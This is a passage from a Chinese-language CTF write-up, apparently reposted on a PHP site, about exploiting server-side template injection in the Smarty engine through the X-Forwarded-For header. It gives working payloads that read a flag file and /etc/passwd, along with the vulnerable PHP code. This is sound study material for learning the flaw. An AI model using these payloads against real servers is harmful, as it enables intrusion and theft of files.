目錄
題目描述
Smarty SSTI 利用
漏洞確認
常規利用方式
{literal}標籤
靜態方法
題目漏洞程式碼
首頁 運維 安全 Smarty SSTi怎麼用

Smarty SSTi怎麼用

May 15, 2023 am 11:37 AM
smarty ssti

題目描述

題目提供了一個讀取XFF頭的api ,頁面最下方有Build With Smarty的字樣,可以確定是用Smarty引擎寫的.

基本上可以確定該頁面存在SSTi的可能性

Smarty SSTi怎么用

將xff頭從127.0.0.1改為127.0.0{1 2}出現如下結果

ssti無疑了

Smarty SSTi怎么用

最終payload是

X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if }

Smarty SSTi怎么用

Smarty SSTI 利用

#Smarty是基於PHP開發的,對於Smarty的SSTI的利用手段與常見的flask的SSTI有很大區別。

漏洞確認

一般情況下輸入{$smarty.version}就可以看到回傳的smarty的版本號碼。這個題目的Smarty版本是3.1.30

Smarty SSTi怎么用

常規利用方式

Smarty支援使用{php}{/php}標籤來執行被包裹其中的php指令,最常規的思路自然是先測試該標籤。但就該題目而言,使用{php}{/php}標籤會報錯誤:

Smarty SSTi怎么用

#在Smarty3的官方手冊裡有以下描述:

Smarty已經廢棄{php}標籤,強烈建議不要使用。在Smarty 3.1,{php}僅在SmartyBC中可用。

該題目使用的是Smarty類,所以只能另尋它路。

{literal}標籤

官方手冊這樣描述這個標籤:

#{literal}可以讓一個模板區域的字元原樣輸出。這常用於保護頁面上的Javascript或css樣式表,避免因為Smarty的定界符而錯被解析。

那麼對於php5的環境我們就可以用

<script language="php">phpinfo();</script>
登入後複製

來實作PHP程式碼的執行,但這題的題目環境是PHP7,這種方法就失效了。

靜態方法

透過self取得Smarty類別再呼叫其靜態方法實作檔案讀寫被網路上很多文章採用。

Smarty類別的getStreamVariable方法的程式碼如下:

public function getStreamVariable($variable)
{
       $_result = '';
       $fp = fopen($variable, 'r+');
       if ($fp) {
           while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
               $_result .= $current_line;
          }
           fclose($fp);
           return $_result;
      }
       $smarty = isset($this->smarty) ? $this->smarty : $this;
       if ($smarty->error_unassigned) {
           throw new SmartyException('Undefined stream variable "' . $variable . '"');
      } else {
           return null;
      }
  }
登入後複製

可以看到這個方法可以讀取一個檔案並回傳其內容,所以我們可以用self來取得Smarty物件並呼叫這個方法,很多文章裡給的payload都形如:{self::getStreamVariable("file:///etc/passwd")}。然而使用這個payload會觸發報錯如下:

Fatal error: Uncaught --> Smarty Compiler: Syntax error in template "string:<meta http-equiv="..."> Current IP:{self::getStreamVariable('file:///etc/passwd')}" static class 'self' is undefined or not allowed by security setting <-- thrown in /var/www/html/smarty/ libs/sysplugins/smarty_internal_templatecompilerbase.phpon line 12

可見這個舊版Smarty的SSTI利用方式並不適用於新版本的Smarty。而且在3.1.30的Smarty版本中官方已經把該靜態方法刪除。對於那些文章提到的利用 Smarty_Internal_Write_File 類別的writeFile方法來寫shell也因為同樣的原因無法使用。

{if}標籤

官方文件中看到這樣的描述:

Smarty的{if}條件判斷和PHP的if 非常相似,只是增加了一些特性。每個{if}必須有一個配對的{/if}. 也可以使用{else}{elseif}.全部的PHP條件式和函數都可以在if內使用,如||, or, &&, and, is_array(), 等等

既然全部的PHP函數都可以使用,那麼我們是否可以利用此來執行我們的程式碼呢?

如同開頭所說的

題目漏洞程式碼

透過getshell之後的檔案讀取,本題引發SSTI的程式碼簡化後如下:

<?php
require_once('./smarty/libs/' . 'Smarty.class.php');
$smarty = new Smarty();
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$smarty->display("string:".$ip);
}

可以看到這裡使用字串取代smarty模板,導致了注入的Smarty標籤被直接解析執行,產生了SSTI。

以上是Smarty SSTi怎麼用的詳細內容。更多資訊請關注PHP中文網其他相關文章!

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱門文章

倉庫:如何復興隊友
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
1 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱門文章

倉庫:如何復興隊友
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
1 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱門文章標籤

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

PHP如何防止SSTI攻擊? PHP如何防止SSTI攻擊? Jun 30, 2023 am 09:36 AM

PHP如何防止SSTI攻擊?

如何使用PHP和Smarty實現前後端分離開發 如何使用PHP和Smarty實現前後端分離開發 Jun 25, 2023 pm 01:46 PM

如何使用PHP和Smarty實現前後端分離開發

PHP中的模板引擎Smarty初探 PHP中的模板引擎Smarty初探 May 11, 2023 pm 05:15 PM

PHP中的模板引擎Smarty初探

PHP開發中如何使用Smarty模板引擎 PHP開發中如何使用Smarty模板引擎 Jun 27, 2023 pm 01:28 PM

PHP開發中如何使用Smarty模板引擎

如何使用PHP和Smarty模板引擎 如何使用PHP和Smarty模板引擎 May 11, 2023 pm 03:33 PM

如何使用PHP和Smarty模板引擎

thinkphp和smarty是什麼 thinkphp和smarty是什麼 Jun 14, 2022 pm 05:56 PM

thinkphp和smarty是什麼

如何在CakePHP中使用Smarty? 如何在CakePHP中使用Smarty? Jun 03, 2023 pm 03:10 PM

如何在CakePHP中使用Smarty?

Smarty SSTi怎麼用 Smarty SSTi怎麼用 May 15, 2023 am 11:37 AM

Smarty SSTi怎麼用

See all articles